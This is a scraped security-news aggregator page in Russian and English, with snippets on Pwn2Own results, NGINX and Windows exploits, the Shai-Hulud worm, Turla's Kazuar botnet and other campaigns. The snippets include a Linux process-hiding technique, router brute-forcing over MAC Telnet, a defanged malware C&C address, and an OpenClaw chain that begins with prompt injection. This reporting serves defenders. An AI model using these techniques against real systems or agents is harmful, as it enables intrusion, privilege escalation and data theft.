На втором месте находится Валентина Пальмиотти с 70 000 долларов США призовых и 7 баллами Master of Pwn.

Напомним, что в прошлом году организаторы Pwn2Own выплатили исследователям 1 078 750 долларов США за обнаружение 28 уникальных 0-day-уязв…

5 часов назад @ xakep.ru
Конференция «Периметр» пройдет в Москве 22 мая
Конференция «Периметр» пройдет в Москве 22 мая Конференция «Периметр» пройдет в Москве 22 мая

22 мая 2026 года в Москве состоится бесплатная конференция «Периметр», посвященная наступательной информационной безопасности и ориентированная на тех, кто привык не только читать отчеты, но и писать эксплойты.

«Периметр» — пространство, где инженеры ИБ, реверсеры, хардварщики и исследователи уязвимостей говорят на одном языке и могут спокойно уходить в детали.

Когда: 22 мая 2026, 10:00 (по московскому времени) Где: Москва, Дворец Культур, ул.

Шарикоподшипниковская, д.15 стр.1Доклады и круглый столРаздался стукКонкретные цифры о состоянии сетей и уязвимостях внешнего периметра корпоративных инфраструктур Рунета.

AI in-the-loopКак использование генеративного AI в связке с привычными инструме…

5 часов назад @ xakep.ru
Гора с секретами. Скрываем процессы в Linux c помощью mount
Гора с секретами. Скрываем процессы в Linux c помощью mount Гора с секретами. Скрываем процессы в Linux c помощью mount

Обыч­но это тер­ритория рут­китов: LKM-модули, перех­ват syscall-таб­лицы, под­мена обра­бот­чиков в / proc .

Все это тре­бует заг­рузки кода в ядро, ком­пиляции под кон­крет­ную вер­сию и оставля­ет замет­ные сле­ды.

warning Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та.

Если заг­лянуть чуть глуб­же, то мож­но узнать, что эта ути­лита смот­рит информа­цию о про­цес­сах в / proc/ :root@0bc5a04d0a00:/ rev# strace ps.. .openat( AT_FDCWD, "/ proc", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3fstat( 3, { st_mode=S_IFDIR|0555, st_size=0, ...}) = 0openat( AT_FDCWD, "/ proc/ uptime", O_RDONLY) =…

7 часов назад @ xakep.ru
Уязвимость в NGINX 18-летней давности приводит к удаленному выполнению кода
Уязвимость в NGINX 18-летней давности приводит к удаленному выполнению кода Уязвимость в NGINX 18-летней давности приводит к удаленному выполнению кода

Исследователи из компании DepthFirst AI обнаружили в NGINX критическую уязвимость CVE-2026-42945, набравшую 9,2 балла по шкале CVSS.

Для этого они отправляли специально подготовленные HTTP-запросы, повреждая структуры памяти NGINX и заставляя сервер вызвать system() при очистке пула памяти.

Однако специалисты подчеркивают, что полноценного удаленного выполнения кода удалось добиться только в системе с отключенной защитой ASLR.

Исправления доступны в составе NGINX Open Source 1.31.0 и 1.30.1, а также в NGINX Plus R36 P4 и R32 P6.

К примеру, известный ИБ-исследователь Кевин Бомонт (Kevin Beaumont) пишет, что опубликованный PoC работает только при специфической конфигурации NGINX и отключенном…

8 часов назад @ xakep.ru
Код червя Shai-Hulud опубликовали на GitHub
Код червя Shai-Hulud опубликовали на GitHub Код червя Shai-Hulud опубликовали на GitHub

Хакеры из группировки TeamPCP скомпрометировали популярные проекты, включая TanStack и Mistral AI, встроили в них стилер для кражи секретов, а затем выставили внутренние репозитории Mistral AI в продажу.

Вскоре после этого исходники самого червя были опубликованы на GitHub под лицензией MIT.

Атаки начались ранее на этой неделе с компрометации пакетов TanStack и Mistral AI.

Спустя несколько дней после начала атак исследователи из компании Ox обнаружили на GitHub два репозитория с исходниками червя Shai-Hulud и сообщением от TeamPCP: «Is it vibe coded?

Ситуация осложняется тем, что Shai-Hulud способен автоматически похищать токены GitHub и npm, загружать украденные данные в новые репозитории …

10 часов назад @ xakep.ru
Уязвимость Fragnesia позволяет получить root-права в Linux
Уязвимость Fragnesia позволяет получить root-права в Linux Уязвимость Fragnesia позволяет получить root-права в Linux

Исследователи обнаружили уже третью за последние недели уязвимость в Linux, связанную с повышением привилегий.

Новый баг получил название Fragnesia и позволяет локальному атакующему получить root-права в большинстве популярных дистрибутивов.

Эксплоит позволяет записывать произвольные байты в page cache ядра для файлов, смонтированных в режиме «только для чтения».

Патчи для Fragnesia уже начали выпускать разработчики AlmaLinux, Amazon Linux, Debian, Ubuntu, Red Hat, SUSE и другие.

Пока исследователи не обнаружили реальных атак с использованием Fragnesia, однако другие свежие LPE в Linux уже начали использовать хакеры.

12 часов назад @ xakep.ru
Foxconn пострадала от кибератаки и утечки данных
Foxconn пострадала от кибератаки и утечки данных Foxconn пострадала от кибератаки и утечки данных

Пока в компании не раскрывают деталей инцидента, однако ответственность за взлом уже взяла на себя вымогательская группировка Nitrogen.

Как сообщили представители Foxconn журналистам, после обнаружения атаки ИБ-команда компании активировала механизмы реагирования и приняла меры для поддержания непрерывной работы производственных площадок.

Компания выпускает устройства и комплектующие для Apple, Nvidia, Intel, Google, Dell, AMD и множества других технологических гигантов.

Как отмечает издание Bleeping Computer, вымогательская группировка Nitrogen уже добавила информацию о взломе Foxconn на свой сайт для публикации утечек.

При этом в самой Foxconn не стали подтверждать, действительно ли инфор…

1 day, 3 hours назад @ xakep.ru
Microsoft исправила 30 критических уязвимостей в рамках «вторника обновлений»
Microsoft исправила 30 критических уязвимостей в рамках «вторника обновлений» Microsoft исправила 30 критических уязвимостей в рамках «вторника обновлений»

В этом месяце разработчики Microsoft исправили множество уязвимостей в продуктах компании, включая баги в DNS Client, Netlogon и Office.

Хотя в этом месяце обошлось без zero-day, некоторые проблемы позволяют удаленно выполнить код без аутентификации, а другие можно эксплуатировать через предварительный просмотр документов.

Из-за ошибки обработки DNS-пакета происходит повреждение памяти, после чего можно выполнить произвольный код удаленно и без аутентификации.

Кроме того, специалисты Microsoft исправили сразу ряд уязвимостей в Office, Word и Excel.

Среди других опасных уязвимостей, исправленных в этом месяце, стоит отметить RCE-уязвимость CVE-2026-35421 в Windows GDI для эксплуатации которо…

1 day, 5 hours назад @ xakep.ru
«Пассворк» стал первым менеджером паролей с сертификацией ФСТЭК России
«Пассворк» стал первым менеджером паролей с сертификацией ФСТЭК России «Пассворк» стал первым менеджером паролей с сертификацией ФСТЭК России

«Пассворк» получил сертификат ФСТЭК России № 5063 по четвертому уровню доверия — наивысшему для коммерческих средств защиты информации.

«Пассворк» стал первым российским менеджером паролей, который официально может применяться для защиты конфиденциальной информации:объектов критической информационной инфраструктурыгосударственных информационных системинформационных систем персональных данныхавтоматизированных систем управленияФСТЭК проверил архитектуру, криптографию, механизмы аутентификации, ролевую модель доступа, журналирование и процессы разработки.

Безопасность подтверждена не только на уровне кода, но и на уровне процессов: от разработки до обновления продукта.

В комплекте с лицензиям…

1 day, 5 hours назад @ xakep.ru
Соседи по проводу. Препарируем сеть провайдера, который забыл про изоляцию клиентов
Соседи по проводу. Препарируем сеть провайдера, который забыл про изоляцию клиентов Соседи по проводу. Препарируем сеть провайдера, который забыл про изоляцию клиентов

Ос­талась одна вер­сия: дело не в нашей сети, а в том, что при­ходит к нам по кабелю от про­вай­дера.

5 , и, если я их вижу, зна­чит, я в одном L2-сег­менте с теми, кто их отправ­ляет.

Я взял MAC-адрес одно­го из соседей из Neighbors и сде­лал MAC Ping, пинг на каналь­ном уров­не, который работа­ет без IP, чис­то по MAC-адре­су.

Си­жу смот­рю на это и понимаю мас­штаб тра­гедии: про­вай­дер раз­дал кор­поратив­ным кли­ентам под­клю­чения в один общий VLAN.

Брутфорс роутеров через MAC Telnet и не толькоMAC Telnet до чужих роуте­ров работа­ет, мы это уже выяс­нили.

1 day, 7 hours назад @ xakep.ru
Преступники тоже жалуются на ИИ-слоп
Преступники тоже жалуются на ИИ-слоп Преступники тоже жалуются на ИИ-слоп

Издание Wired сообщает, что на подпольных форумах и хакерских площадках все чаще появляются жалобы на «ИИ-мусор», который проникает в обсуждения, гайды и технические посты.

Исследование проводилось совместно с учеными из Кембриджского университета и Университета Стратклайда.

Эксперты изучили почти 98 000 обсуждений, связанных с ИИ, на хакерских форумах (с момента выхода ChatGPT в 2022 году и до конца 2025 года).

Также исследователи Flashpoint заметили, что в даркнете активно обсуждается новая модель Claude Mythos Preview компании Anthropic.

Так, генеративные модели пока не снизили порог входа для новичков и не привели к кардинальным изменениям в этой экосистеме.

1 day, 8 hours назад @ xakep.ru
Исследователь опубликовал эксплоиты для двух 0-day в Windows
Исследователь опубликовал эксплоиты для двух 0-day в Windows Исследователь опубликовал эксплоиты для двух 0-day в Windows

Напомним, что в апреле 2026 года исследователь уже публиковал эксплоиты BlueHammer, RedSun и UnDefend, заявляя, что делает это в знак протеста против того, как специалисты Microsoft Security Response Center (MSRC) обращаются с ИБ-специалистами.

Исследователь сдержал это обещание и после майского «вторника обновлений» обнародовал эксплоиты для еще двух 0-day.

«Я заметил, что Microsoft незаметно исправила уязвимость RedSun, без CVE, без всего, просто незаметное обновление.

Эксплоит затрагивает Windows 11 и Windows Server 2022/2025 и позволяет получить доступ к защищенному BitLocker диску посредством Windows Recovery Environment (WinRE).

А Chaotic Eclipse обещает устроить «сюрприз» к следующем…

1 day, 10 hours назад @ xakep.ru
Регистрация в RubyGems приостановлена из-за массовой атаки
Регистрация в RubyGems приостановлена из-за массовой атаки Регистрация в RubyGems приостановлена из-за массовой атаки

RubyGems — основной пакетный менеджер экосистемы Ruby — временно закрыл регистрацию новых аккаунтов после масштабной атаки на репозиторий.

В результате регистрация в RubyGems была приостановлена, и теперь при попытке создать учетную запись выводится соответствующее сообщение.

«У меня плохое предчувствие насчет этой атаки на RubyGems: возможно, за ней скрывается что-то более сложное.

Эксперты обнаружили более 150 пакетов в RubyGems, которые использовали репозиторий не для распространения малвари, а как канал для хранения и вывода данных.

Пакеты автоматически скачивали информацию с британских муниципальных порталов, упаковывали полученные данные в архивы .gem и публиковали их в RubyGems с пом…

1 day, 12 hours назад @ xakep.ru
In English 🇺🇸
The Hacker News The Hacker News
последний пост 3 часа назад
Turla Turns Kazuar Backdoor Into Modular P2P Botnet for Persistent Access
Turla Turns Kazuar Backdoor Into Modular P2P Botnet for Persistent Access Turla Turns Kazuar Backdoor Into Modular P2P Botnet for Persistent Access

The Russian state-sponsored hacking group known as Turla has transformed its custom backdoor Kazuar into a modular peer-to-peer (P2P) botnet that's engineered for stealth and persistent access to compromised hosts.

Bridge , which acts as a proxy between the leader Kernel module and the C2 server.

The component also "elects" a single Kernel leader to communicate with the Bridge module on behalf of the other Kernel modules.

"Once a leader is elected, it announces itself as the leader and tells all other Kernel modules to set SILENT.

Only the elected leader is not SILENT, which allows the leader Kernel module to log activity and request tasks through the Bridge module."

3 часа назад @ thehackernews.com
Four OpenClaw Flaws Enable Data Theft, Privilege Escalation, and Persistence
Four OpenClaw Flaws Enable Data Theft, Privilege Escalation, and Persistence Four OpenClaw Flaws Enable Data Theft, Privilege Escalation, and Persistence

Cybersecurity researchers have disclosed a set of four security flaws in OpenClaw that could be chained to achieve data theft, privilege escalation, and persistence.

CVE-2026-44113 (CVSS score: 7.7/6.3) - A TOCTOU race condition vulnerability in OpenShell that allows attackers to bypass sandbox restrictions and read files outside the intended mount root.

(CVSS score: 7.7/6.3) - A TOCTOU race condition vulnerability in OpenShell that allows attackers to bypass sandbox restrictions and read files outside the intended mount root.

The exploitation chain unfolds over four steps -A malicious plugin, prompt injection, or compromised external input gains code execution inside the OpenShell sandbox.…

7 часов назад @ thehackernews.com
What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack Surface
What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack Surface What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack Surface

That's what Bitdefender's complimentary Internal Attack Surface Assessment is built to answer.

How the Assessment WorksThe engagement runs in four steps over roughly 45 days, powered by GravityZone PHASR — Bitdefender's Proactive Hardening and Attack Surface Reduction technology — and sits alongside whatever endpoint stack you already run:Kickoff and behavioral learning.

Attack Surface Dashboard review.

For the business decision-maker: documented, ongoing surface reduction — increasingly what regulators, auditors, and cyber-insurers want to see.

If you run a Windows-heavy environment with 250 or more users, request your Internal Attack Surface Assessment here.

9 часов назад @ thehackernews.com
TanStack Supply Chain Attack Hits Two OpenAI Employee Devices, Forces macOS Updates
TanStack Supply Chain Attack Hits Two OpenAI Employee Devices, Forces macOS Updates TanStack Supply Chain Attack Hits Two OpenAI Employee Devices, Forces macOS Updates

"Upon identification of the malicious activity, we worked quickly to investigate, contain, and take steps to protect our systems," OpenAI said.

Since the impacted repositories included signing certificates for iOS, macOS, and Windows products, the company has taken the step of revoking the certificates and issuing new ones.

"This helps prevent any risk, however unlikely, of someone attempting to distribute a fake app that appears to be from OpenAI," OpenAI said.

TeamPCP has since announced a supply chain attack contest in partnership with Breached cybercrime, offering participants with a $1,000 in Monero to compromise open-source packages using the Shai-Hulud worm that it has made freely av…

9 часов назад @ thehackernews.com
On-Prem Microsoft Exchange Server CVE-2026-42897 Exploited via Crafted Email
On-Prem Microsoft Exchange Server CVE-2026-42897 Exploited via Crafted Email On-Prem Microsoft Exchange Server CVE-2026-42897 Exploited via Crafted Email

Microsoft has disclosed a new security vulnerability impacting on-premise versions of Exchange Server that it said has come under active exploitation in the wild.

"Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network," the tech giant said in a Thursday advisory.

Redmond also noted that it's providing a temporary mitigation through its Exchange Emergency Mitigation Service, while it's readying a permanent fix for the security defect.

The Exchange Emergency Mitigation Service will provide the mitigation automatically via a URL rewrite configuration, and is enabled by…

14 часов назад @ thehackernews.com
CISA Adds Cisco SD-WAN CVE-2026-20182 to KEV After Admin Access Exploits
CISA Adds Cisco SD-WAN CVE-2026-20182 to KEV After Admin Access Exploits CISA Adds Cisco SD-WAN CVE-2026-20182 to KEV After Admin Access Exploits

"Cisco Catalyst SD-WAN Controller and Manager contain an authentication bypass vulnerability that allows an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system," CISA said.

In a separate advisory, Cisco attributed the active exploitation of CVE-2026-20182 with high confidence to UAT-8616, the same cluster behind the weaponization of CVE-2026-20127 to gain unauthorized access to SD-WAN systems.

"UAT-8616 performed similar post-compromise actions after successfully exploiting CVE-2026-20182, as was observed in the exploitation of CVE-2026-20127 by the same threat actor," Cisco Talos said.

The three vulnerabilities, when chained …

15 часов назад @ thehackernews.com
Cisco Catalyst SD-WAN Controller Auth Bypass Actively Exploited to Gain Admin Access
Cisco Catalyst SD-WAN Controller Auth Bypass Actively Exploited to Gain Admin Access Cisco Catalyst SD-WAN Controller Auth Bypass Actively Exploited to Gain Admin Access

Cisco has released updates to address a maximum-severity authentication bypass flaw in Catalyst SD-WAN Controller that it said has been exploited in limited attacks.

"A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system," Cisco said.

A successful exploit could permit the attacker to log in to the Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-root user account, and then weaponize it to access NETCONF and manipulate network con…

1 day, 2 hours назад @ thehackernews.com
Stealer Backdoor Found in 3 Node-IPC Versions Targeting Developer Secrets
Stealer Backdoor Found in 3 Node-IPC Versions Targeting Developer Secrets Stealer Backdoor Found in 3 Node-IPC Versions Targeting Developer Secrets

Cybersecurity researchers are sounding the alarm about what has been described as "malicious activity" in newly published versions of node-ipc.

The three versions were published by an account named "atiertant," which has no connection to the package's original author, "riaevangelist."

Although "atiertant" appears in the maintainer list, the account has no prior publish history in connection with the node-ipc package.

The 9.x versions do not have this gate and will execute the full payload on any system that loads them."

This is not the first time the npm package has incorporated malicious functionality.

1 day, 3 hours назад @ thehackernews.com
ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories
ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories

This week feels dumb in the worst way — bad links, weak checks, fake help desks, shady forum posts, and people turning supply chain attacks into some cursed little game for clout and cash.

Half of it feels new.

Half of it feels like crap we should have fixed years ago.

The mess keeps getting louder: users get tricked, boxes get popped, tools meant for normal work get used for bad stuff, and nobody seems shocked anymore.

Attackers keep winning with simple crap: fake prompts, trusted tools, weak checks, and old systems nobody wants to fix.

1 day, 4 hours назад @ thehackernews.com
Ghostwriter Targets Ukrainian Government With Geofenced PDF Phishing, Cobalt Strike
Ghostwriter Targets Ukrainian Government With Geofenced PDF Phishing, Cobalt Strike Ghostwriter Targets Ukrainian Government With Geofenced PDF Phishing, Cobalt Strike

The Belarus-aligned threat group known as Ghostwriter has been attributed to a fresh set of attacks targeting governmental organizations in Ukraine.

Active since at least 2016, Ghostwriter has been linked to both cyber espionage and influence operations targeting neighboring countries, particularly Ukraine.

In late 2023, the threat actor was also observed weaponizing a vulnerability in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike.

"The nature of the interaction between the groups remains unclear, but the recorded intersections of tools and infrastructure indicate at least the potential coordination of actions against Russian organizations," Kaspersky sa…

1 day, 6 hours назад @ thehackernews.com
PraisonAI CVE-2026-44338 Auth Bypass Targeted Within Hours of Disclosure
PraisonAI CVE-2026-44338 Auth Bypass Targeted Within Hours of Disclosure PraisonAI CVE-2026-44338 Auth Bypass Targeted Within Hours of Disclosure

Threat actors have been observed attempting to exploit a recently disclosed security vulnerability in PraisonAI, an open-source multi-agent orchestration framework, within four hours of public disclosure.

"PraisonAI ships a legacy Flask API server with authentication disabled by default," according to an advisory released by the maintainers earlier this month.

In a report published by Sysdig this week, the cloud security company said it observed attempts to exploit the flaw within hours of it becoming public knowledge.

While the first pass scanned generic disclosure paths (/.env, /admin, /users/sign_in, /eval, /calculate, /Gemfile.lock), the second pass specifically singled out AI-agent sur…

1 day, 9 hours назад @ thehackernews.com
How AI Hallucinations Are Creating Real Security Risks
How AI Hallucinations Are Creating Real Security Risks How AI Hallucinations Are Creating Real Security Risks

AI hallucinations are introducing serious security risks into critical infrastructure decision-making by exploiting human trust through highly confident yet incorrect outputs.

The first step toward mitigating the impact of AI hallucinations is understanding how they form.

Here are the various factors that may contribute to AI hallucinations:Flawed training data: AI models learn from the data they are trained on.

Employees who understand that AI outputs should always be validated before use are less likely to interpret the AI system as authoritative by default.

Place identity security at the center of AI governanceAI hallucinations become real security risks when they lead to action, which i…

1 day, 9 hours назад @ thehackernews.com
Windows Zero-Days Expose BitLocker Bypasses And CTFMON Privilege Escalation
Windows Zero-Days Expose BitLocker Bypasses And CTFMON Privilege Escalation Windows Zero-Days Expose BitLocker Bypasses And CTFMON Privilege Escalation

An anonymous cybersecurity researcher who disclosed three Microsoft Defender vulnerabilities has returned with two more zero-days involving a BitLocker bypass and a privilege escalation impacting Windows Collaborative Translation Framework (CTFMON).

YellowKey affects Windows 11 and Windows Server 2022/2025.

And we get a cmd.exe prompt, with BitLocker unlocked instead of the expected Windows Recovery environment."

This second WIM contains a WinRE image infected with 'cmd.exe,' which executes with the decrypted BitLocker volume."

"And as long as it is not revoked, even an old, vulnerable boot manager can be loaded without triggering an alert," Intrinsec noted.

1 day, 11 hours назад @ thehackernews.com
New Fragnesia Linux Kernel LPE Grants Root Access via Page Cache Corruption
New Fragnesia Linux Kernel LPE Grants Root Access via Page Cache Corruption New Fragnesia Linux Kernel LPE Grants Root Access via Page Cache Corruption

"The vulnerability allows unprivileged local attackers to modify read-only file contents in the kernel page cache and achieve root privileges through a deterministic page-cache corruption primitive," Google-owned Wiz said.

"However, it is in the same surface and the mitigation is the same as for Dirty Frag.

"Customers who have already applied the Dirty Frag mitigation need no further action until patched kernels are released," CloudLinux maintainers said.

However, unlike Dirty Frag, no host-level privileges are required.

"If patching is not possible at this point, consider applying the same mitigations for Dirty Frag."

1 day, 13 hours назад @ thehackernews.com
18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE
18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE 18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE

Cybersecurity researchers have disclosed multiple security vulnerabilities impacting NGINX Plus and NGINX Open, including a critical flaw that remained undetected for 18 years.

"NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module," F5 said in an advisory released Wednesday.

"An unauthenticated attacker, along with conditions beyond its control, can exploit this vulnerability by sending crafted HTTP requests.

This may cause a heap buffer overflow in the NGINX worker process, leading to a restart.

What makes the vulnerability severe is that it's reachable without authentication, can be reliably used to trigger the heap overflow, and can lead to remote c…

1 day, 14 hours назад @ thehackernews.com
threatpost threatpost
последний пост None
DarkReading
последний пост None
WeLiveSecurity
последний пост 1 day, 11 hours назад
FrostyNeighbor: Fresh mischief and digital shenanigans
FrostyNeighbor: Fresh mischief and digital shenanigans FrostyNeighbor: Fresh mischief and digital shenanigans

Every 10 minutes, the compromised computer’s fingerprint is sent to the C&C server via an HTTP POST request to https://book-happy.needbinding[.]icu/employment/documents-and-resources.

If the C&C server response content is larger than 100 bytes, the received data is executed using the eval method.

]icu N/A 2026‑03‑10 Cobalt Strike C&C server.

]icu N/A 2026‑04‑14 PicassoLoader C&C server.

]buzz N/A 2026‑04‑14 Cobalt Strike C&C server.

1 day, 11 hours назад @ welivesecurity.com
Eyes wide open: How to mitigate the security and privacy risks of smart glasses
Eyes wide open: How to mitigate the security and privacy risks of smart glasses Eyes wide open: How to mitigate the security and privacy risks of smart glasses

Smart glasses allow anyone to track and record the world around them.

So we probably shouldn’t be surprised that smart glasses are doing the rounds once more, after a failed attempt by Google to popularize them over a decade ago.

This presents significant security and privacy risks for both smart glasses users and the people they interact with.

Smart glasses give anyone the ability to record or take photos of strangers surreptitiously.

It might put you in physical danger if you lose track of your surroundingsFor bystanders:Keep your eyes peeled for anyone wearing smart glasses.

4 days, 11 hours назад @ welivesecurity.com
Fake call logs, real payments: How CallPhantom tricks Android users
Fake call logs, real payments: How CallPhantom tricks Android users Fake call logs, real payments: How CallPhantom tricks Android users

We identified and reported 28 CallPhantom apps on Google Play, cumulatively downloaded more than 7.3 million times.

The table in the Analyzed CallPhantom apps section lists each app along with its key details, including the download count.

Examples of CallPhantom initial screensCampaign overviewThe CallPhantom apps we found on Google Play mainly targeted Android users in India and the broader Asia‑Pacific region.

No data generation occurs until after payment; users have to pay or subscribe before any email would supposedly be sent.

For these third-party payment apps, CallPhantom apps either included hardcoded URLs or fetched the URLs dynamically from a Firebase realtime database, meaning th…

1 week, 1 day назад @ welivesecurity.com
Fixing the password problem is as easy as 123456
Fixing the password problem is as easy as 123456 Fixing the password problem is as easy as 123456

The most-used password globally is exactly what you think it is: ‘123456.’ That’s according to NordPass’s latest annual report on passwords exposed in data breaches globally.

NordPass’s data suggests that there are many more sites that set limited password policies and allow trivial passwords like ‘123456’.

However, I think there may also be elements of legacy in the method used to calculate the most common passwords.

Breaking the cycleNow, how do we resolve this never-ending loop of negativity about passwords, along with the ridiculous situation that platforms still permit non-secure passwords?

There is a simple and effective way to resolve it: mandate complex passwords or, better yet, MFA.

1 week, 1 day назад @ welivesecurity.com
A rigged game: ScarCruft compromises gaming platform in a supply-chain attack
A rigged game: ScarCruft compromises gaming platform in a supply-chain attack A rigged game: ScarCruft compromises gaming platform in a supply-chain attack

In this blogpost, we provide an overview of the attack, and the first public analysis of the Android backdoor.

sqgame is a gaming platform tailored for the people of Yanbian and hosts traditional Yanbian games for Windows, Android, and iOS.

Android BirdCall analysisIn this section, we provide a technical analysis of the Android BirdCall backdoor – an Android port of the eponymous Windows backdoor written in C++.

Trojanized Android gamesAndroid BirdCall is distributed via trojanized Android games.

During our research, we observed 12 Zoho WorkDrive drives used by the Android BirdCall backdoor for C&C purposes.

1 week, 3 days назад @ welivesecurity.com
This month in security with Tony Anscombe – April 2026 edition
This month in security with Tony Anscombe – April 2026 edition This month in security with Tony Anscombe – April 2026 edition

Tony also offers insights that the they may hold for your own cyber-defenses.

Iranian-linked hackers are targeting Rockwell programmable logic controllers (PLCs), with almost 4,000 such devices exposed on the networks of U.S. critical infrastructure organizations, according to a warning from multiple U.S. federal agencies.

How can critical infrastructure organizations using Rockwell PLCs stay safe?

How do the FBI's figures compare to those from 2024 and what was the most damaging scam to affect businesses last year?

Learn this and more from Tony's video and be sure to check out the March 2026 edition of Tony's monthly security news roundup for more insights.

2 weeks, 1 day назад @ welivesecurity.com
The calm before the ransom: What you see is not all there is
The calm before the ransom: What you see is not all there is The calm before the ransom: What you see is not all there is

Calm feels like evidence that the danger has passed, which changes behavior in ways that reintroduce the danger.

Yet more trapsThe formal state of an organization’s security is easy to measure and – assuming all turns out well – also easy to feel good about.

When the confidence shattersThis all matters also because a ransomware intrusion is a business continuity event whose effects extend far and wide.

Discipline is everythingIn addition to the right tools and people, security that holds up over time rests on the habit of watching and adapting.

It’s what security tools can ‘convert’ into detections and alerts that let security teams act in time.

3 weeks назад @ welivesecurity.com
GopherWhisper: A burrow full of malware
GopherWhisper: A burrow full of malware GopherWhisper: A burrow full of malware

GopherWhisper abuses legitimate services, notably Discord, Slack, Microsoft 365 Outlook, and file.io for command and control (C&C) communication and exfiltration.

GopherWhisper leverages Discord, Slack, Microsoft 365 Outlook, and file.io for C&C communications and exfiltration.

The malware we initially discovered consists of the following:JabGopher: an injector that executes the LaxGopher backdoor disguised as whisper.dll .

GopherWhisper toolset overviewRevealing messagesAs mentioned in the introduction, GopherWhisper is characterized by the extensive use of legitimate services such as Slack, Discord, and Outlook for C&C communication.

In addition, several interesting links to GitHub reposi…

3 weeks, 1 day назад @ welivesecurity.com
New NGate variant hides in a trojanized NFC payment app
New NGate variant hides in a trojanized NFC payment app New NGate variant hides in a trojanized NFC payment app

Additionally, the code can also capture the victim’s payment card PIN and exfiltrate it to the operators’ C&C server.

Apart from relaying NFC data, the malicious code also steals payment card PINs.

The first NGate attacks employed the open-source NFCGate tool to facilitate the transfer of NFC data.

Once installed, the app asks to be set as the default payment app, which can be seen in Figure 10.

Initial request to set the app as the default NFC payment appFigure 11.

3 weeks, 3 days назад @ welivesecurity.com
What the ransom note won't say
What the ransom note won't say What the ransom note won't say

Collectively, they pave the way for the intrusion long before the ransom note arrives.

ESET’s detection data shows ransomware rising by 13 percent in the second half of 2025 compared to the prior six months, following a 30-percent increase in the first half of 2025.

Meanwhile, Verizon’s 2025 Data Breach Investigations Report (DBIR) recorded a jump from 32% to 44% in the share of breaches involving ransomware, while the median ransom payment fell from $150,000 to $115,000.

As the products have improved, criminals responded by building a clandestine market for tools designed to disable them.

The sheer investment in EDR killers is, somewhat perversely, the clearest measure of how much damage t…

3 weeks, 4 days назад @ welivesecurity.com
That data breach alert might be a trap
That data breach alert might be a trap That data breach alert might be a trap

Ignoring a real breach notification invites risk, but falling for a bogus one could be even worse.

What do fake breach notification scams look like?

Either:The scammers wait for a real breach, and piggyback on the news to send out a fake notification.

Spotting the red flagsFake breach notifications should be easy to spot if you know what to look out for.

Staying safeUnderstanding what to look out for is the first step to staying safe from breach notification scams.

4 weeks назад @ welivesecurity.com
Supply chain dependencies: Have you checked your blind spot?
Supply chain dependencies: Have you checked your blind spot? Supply chain dependencies: Have you checked your blind spot?

This seems extremely low given the scale and frequency of supply chain incidents – and how broadly ‘supply chain’ really stretches.

Notably, 3CX itself was the downstream victim of another supply chain attack, courtesy of a compromised Trading Technologies X_TRADER installer.

CISOs rated supply chain disruption #2 for 2025 and #2 again for 2026, while CEOs rate supply chain disruption #3 for 2025.

Talk about a supply chain blind spot…What are key considerations around geopolitical supply chain risk?

Resilience is imperativeIn a world of escalating threats and risky interdependencies, supply chain cyber resilience is a competitive differentiator at the survival level.

4 weeks, 1 day назад @ welivesecurity.com
Recovery scammers hit you when you’re down: Here’s how to avoid a second strike
Recovery scammers hit you when you’re down: Here’s how to avoid a second strike Recovery scammers hit you when you’re down: Here’s how to avoid a second strike

If you’ve been the victim of fraud, you’re likely already a lead on a ‘sucker list’ – and if you’re not careful, your ordeal may be about to get worse.

Online scammers only care about one thing: making money, so when new opportunities arise to do just that, they take them.

Recovery fraud is an umbrella for several predatory tactics, all sharing a common goal: the “second strike.”How does recovery fraud work?

This is basically a kind of advance fee fraud.

If you’ve been victimized by recovery scammers, there are a limited set of options available to you.

1 month назад @ welivesecurity.com
As breakout time accelerates, prevention-first cybersecurity takes center stage
As breakout time accelerates, prevention-first cybersecurity takes center stage As breakout time accelerates, prevention-first cybersecurity takes center stage

Threat actors are using AI to supercharge tried-and-tested TTPs.

The former are using AI, automation and a range of techniques to sometimes devastating effect.

But n the other hand, threat actors are just doing what they have done before – supercharging existing tactics, techniques and procedures (TTPs) to accelerate attacks.

Threat actors are:Getting better at stealing/cracking/phishing legitimate credentials from your employees.

Catching threat actors at this point is essential – especially as exfiltration (when it begins) is also being accelerated by AI.

1 month, 1 week назад @ welivesecurity.com
Digital assets after death: Managing risks to your loved one’s digital estate
Digital assets after death: Managing risks to your loved one’s digital estate Digital assets after death: Managing risks to your loved one’s digital estate

Now just have a think about all of the digital assets you’re likely to leave for loved ones to manage.

From a legal perspective, inheritance laws often don’t include digital assets, online policies can be “opaque” and tools fragmented, it says.

However, a proposed Property (Digital Assets, etc.)

However, a proposed Property (Digital Assets, etc.)

Or a fictitious “account recovery” service provider claiming they can access your loved one’s digital assets for a fee.

1 month, 2 weeks назад @ welivesecurity.com
Naked Security Naked Security
последний пост None
Help Net Security Help Net Security
последний пост 7 часов назад
Google lets Workspace admins apply one policy across all SAML apps
Google lets Workspace admins apply one policy across all SAML apps

